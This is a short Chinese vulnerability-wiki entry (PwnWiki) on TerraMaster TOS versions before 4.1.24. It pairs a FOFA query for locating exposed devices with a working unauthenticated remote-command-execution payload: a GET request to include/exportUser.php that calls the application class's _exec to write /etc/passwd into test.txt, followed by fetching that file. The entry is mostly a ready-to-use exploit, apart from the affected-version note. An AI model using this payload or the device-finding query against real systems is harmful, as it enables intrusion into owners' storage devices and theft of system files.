免费、自由、人人可编辑的漏洞库
,
漏洞影响
TerraMaster TOS < 4.1.24
FOFA
"TerraMaster" && header="TOS"
漏洞利用
在其他文件的代码检查期间,也发现有一种方法可以利用TOS软件中预先存在的类来利用此问题。位于include/class/application.class.php中的PHP类是在运行TOS软件的设备上执行命令的最佳人选。
由于exportUser.php没有身份验证控件,因此未经身份验证的攻击者有可能通过提供以下值作为HTTP GET参数来实现代码执行。
http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt
返回200后再次访问
http://xxx.xxx.xxx.xxx/include/test.txt
免费、自由、人人可编辑的漏洞库--PwnWiki.com
